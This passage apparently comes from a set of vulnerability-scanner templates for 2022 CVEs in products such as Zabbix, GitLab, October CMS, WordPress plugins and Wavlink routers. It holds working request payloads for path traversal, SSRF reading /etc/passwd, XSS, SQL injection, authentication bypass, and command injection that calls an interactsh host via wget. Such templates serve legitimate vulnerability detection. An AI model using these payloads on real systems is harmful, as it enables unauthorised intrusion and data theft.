Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["EricomSecureGateway"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-42748","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-2488","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-23347","info":{"name":"BigAnt Server v5.6.06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-23102","info":{"name":"SINEMA Remote Connect Server < V2.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: csrftoken={{csrf}};\nReferer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\ncsrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n"],"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name='csrfmiddlewaretoken' value='(.*)' />"],"internal":true}]}]},{"id":"CVE-2022-30776","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error: 1<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34753","info":{"name":"SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /delsnap.pl?name=|id HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-0150","info":{"name":"WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wah_target_src = '';alert(document.domain);//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"</script><script>alert(document.cookie);</script>","text: \"</script><script>alert(document.cookie);</script>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21705","info":{"name":"October CMS -  Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onSave\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onCreateTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&type=page\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onOpenTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["function onInit()","phpinfo()","Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`."],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"session_key","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[1]"],"attribute":"value"},{"type":"xpath","name":"token","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[2]"],"attribute":"value"},{"type":"regex","name":"theme","group":1,"regex":["<input\\stype=\\\\\"hidden\\\\\"\\svalue=\\\\\"demo\\\\\"\\sname=\\\\\"([^\"]*)\\\\\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-23131","info":{"name":"Zabbix - SAML SSO Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/index_sso.php","{{BaseURL}}/index_sso.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(header), 'location: zabbix.php?action=dashboard.view')"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=</script><img+src+onerror=alert(document.domain)>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29548","info":{"name":"WSO2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CARBON.showWarningDialog('???');alert(document.domain)//???"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0165","info":{"name":"WordPress Page Builder KingComposer <=2.9.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2022-38553","info":{"name":"Academy Learning Management System <5.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","Study any topic"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32444","info":{"name":"u5cms v8.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginsave.php?u=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25125","info":{"name":"MCMS 5.2.4  - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-0968","info":{"name":"Microweber <1.2.12 - Integer Overflow","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1\nHost: {{Hostname}}\n","POST /api/user/2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nthumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,'\\\"first_name\\\":\\\"{{payload}}\\\"')","status_code_3==200","contains(header_3,\"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"token\" value=\"(.*)\" autocomplete=\"off\">"],"internal":true,"part":"body"},{"type":"regex","name":"user","group":1,"regex":["<input type=\"text\" class=\"form-control\" name=\"username\" value=\"(.*)\">"],"internal":true,"part":"body"},{"type":"regex","name":"email","group":1,"regex":["<input type=\"email\" class=\"form-control\" name=\"email\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/user/login/?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/logout?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/register?next=https%3A%2F%2Finteract.sh","{{BaseURL}}/user/resend-activation?next=https%3A%2F%2Finteract.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-1906","info":{"name":"WordPress Copyright Proof <=4.16 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["got message <script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-41441","info":{"name":"ReQlogic v11.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>","{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"],"stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"POProcessTimeout\")"],"condition":"and"}]}]},{"id":"CVE-2022-1609","info":{"name":"The School Management < 9.9.7 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-json/am-member/license HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nblowfish=1&blowf=system('{{cmd}}');\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["9061-2202-EVC"]}]}]},{"id":"CVE-2022-2633","info":{"name":"All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24124","info":{"name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error.*&#39","casdoor"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45037","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["<script>alert(document.domain)</script>","SESSION_TIMEOUT"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"username_fieldname_2","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-35405","info":{"name":"Zoho ManageEngine - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{RootURL}}/xmlrpc"],"body":"<?xml version=\"1.0\"?><methodCall><methodName>{{randstr}}</methodName><params><param><value>big0us</value></param></params></methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>faultString</name>"]},{"type":"word","part":"body","words":["No such service [{{randstr}}]","No such handler: {{randstr}}"],"condition":"or"},{"type":"word","part":"body","words":["<methodResponse>","</methodResponse>"],"condition":"or"}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42746","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-0928","info":{"name":"Microweber < 1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/shop/save_tax_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:settings\n\nid=0&name=vat1&type=\"><img+src%3dx+onerror%3dalert(document.domain)>&rate=10\n","POST /module HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer:{{BaseURL}}/admin/view:settings\n\nclass=+module+module-shop-taxes-admin-list-taxes+&id=mw_admin_shop_taxes_items_list&parent-module-id=settings-admin-mw-main-module-backend-shop-taxes-admin&parent-module=shop%2Ftaxes%2Fadmin&data-type=shop%2Ftaxes%2Fadmin_list_taxes\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"<img src=x onerror=alert(document.domain)></td>\")","contains(header_3,\"text/html\")","status_code_2 == 200 && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-46381","info":{"name":"Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=1&type=\"/><svg/onload=\"alert(document.domain)\"/>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<svg/onload=\"alert(document.domain)\"/>","Badging Template"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; 